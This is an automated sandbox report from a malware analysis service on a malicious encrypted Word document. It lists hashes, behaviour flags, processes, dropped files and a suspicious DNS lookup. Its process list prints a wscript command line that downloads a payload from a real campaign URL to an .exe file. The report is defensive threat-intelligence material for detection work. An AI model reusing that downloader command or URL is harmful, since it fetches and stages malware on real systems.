analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

inv_475481.doc

Full analysis: https://app.any.run/tasks/5fec9620-2ae7-4636-9f18-25377707e949
Verdict: Malicious activity
Analysis date: February 21, 2020, 23:06:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
encrypted
maldoc-8
Indicators:
MIME: application/encrypted
File info: CDFV2 Encrypted
MD5:

DF2587EFC0598D4AFA62C293D472F8D1

SHA1:

EB0C3F8A0BEAED7C835B3B3BFB746DD6713EF957

SHA256:

5BA417F02473E61AEBD5BE2DF8D8CE969A45E50340DA529EA6E25EFCAA76B110

SSDEEP:

768:r2FfTj0pCPhs0YpII0gUJn9KGIpwv/up6YsK85jfJbRQaUyGyjLSLO3lgg2222h7:rmH0Ab/K4/up6YtyJbRQaUbyjcO3OLjU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 1740)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1740)

  • SUSPICIOUS

    • Executes scripts

      • cmd.exe (PID: 2096)
      • cmd.exe (PID: 3000)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1740)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1740)

    • Manual execution by user

      • explorer.exe (PID: 1916)
      • cmd.exe (PID: 2856)
      • WScript.exe (PID: 2500)
      • cmd.exe (PID: 3972)
      • cmd.exe (PID: 3000)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
9
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs wscript.exe no specs explorer.exe no specs wscript.exe no specs cmd.exe no specs wscript.exe no specs cmd.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1740"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\inv_475481.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2096cmd /c ""C:\DecemberLogs\Restaraunt2.cmd" "C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3228wscript //nologo c:\DecemberLogs\OliviaMatter.vbs http://warmsun.xyz/xelfbiuojlwgbyumvyzb/frllo.bin C:\DecemberLogs\Caff54e1.exeC:\Windows\system32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
1
Version:
5.8.7600.16385
1916"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2500"C:\Windows\System32\WScript.exe" "C:\DecemberLogs\OliviaMatter.vbs" C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3000cmd /c ""C:\DecemberLogs\Restaraunt2.cmd" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
660wscript //nologo c:\DecemberLogs\OliviaMatter.vbs http://warmsun.xyz/xelfbiuojlwgbyumvyzb/frllo.bin C:\DecemberLogs\Caff54e1.exeC:\Windows\system32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
1
Version:
5.8.7600.16385
3972cmd /c ""C:\DecemberLogs\Restaraunt3.cmd" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2856cmd /c ""C:\DecemberLogs\Restaraunt4.cmd" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 896
Read events
1 108
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
101
Unknown types
6

Dropped files

PID
Process
Filename
Type
1740WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6BD2.tmp.cvr
MD5:
SHA256:
1740WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFE80C5A60374EDD5D.TMP
MD5:
SHA256:
1740WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF7D9ED774A7AC3225.TMP
MD5:
SHA256:
1740WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF8F51D8C4943BE89C.TMP
MD5:
SHA256:
1740WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF78629C4863C417BC.TMP
MD5:
SHA256:
1740WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF03B3305ABE726414.TMP
MD5:
SHA256:
1740WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFB80B76730DD08006.TMP
MD5:
SHA256:
1740WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:EB485F74CC943275D5E703CED241FBA7
SHA256:DD3FE08FA89D94846F018981F41252469B8524C53F0782F6AB01F92E903B072B
1740WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSINKAUTLib.exdtlb
MD5:7135629EC4692D5FB6EEA3C7D134EB7C
SHA256:39A29E40FB52A87F4487FDD184E7DB9FE5F01D4DEDF3809988F5101DDE6112C5
1740WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\ATLEntityPickerLib.exdtlb
MD5:3296BC44AD7981CFF907E8094A7975B1
SHA256:51B94C0E7018AD56C46FEBA66611D48ABEFFAF9E85C88B1DED1D4E0FA2BD0BD3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
8
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
warmsun.xyz
suspicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
inv_475481.doc